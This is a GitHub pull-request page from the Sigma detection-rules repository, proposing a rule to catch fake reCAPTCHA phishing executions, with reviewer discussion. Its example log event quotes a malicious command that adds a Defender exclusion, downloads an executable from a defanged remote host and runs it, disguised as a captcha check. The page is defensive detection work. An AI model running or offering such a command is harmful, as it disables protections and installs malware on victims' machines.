-
-
Notifications
You must be signed in to change notification settings - Fork 2.3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Adding rule for detecting recaptcha phish process executions #5218
base: master
Are you sure you want to change the base?
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Welcome @montysecurity 👋
It looks like this is your first pull request on the Sigma rules repository!
Please make sure to read the SigmaHQ conventions document to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.
Thanks again, and welcome to the Sigma community! 😃
Hi Thats why i added them on commandline not on image just to be safe proc_creation_win_susp_clickfix_execution_pattern.yml
|
Good eye and thanks for the assist @swachchhanda000 ! |
…oc_creation_win_susp_clickfix_execution.yml
You do not need the CLI for the binaries as the captcha strings are enough. |
@nasbench , @frack113 |
@swachchhanda000 what about something like this? going for the more generic approach
|
Summary of the Pull Request
Adding rule for detecting recaptcha phish process executions
Changelog
New: proc_creation_win_powershell_fake_captcha.yml
Example Log Event
cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''
Reference: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
Fixed Issues
N/A
SigmaHQ Rule Creation Conventions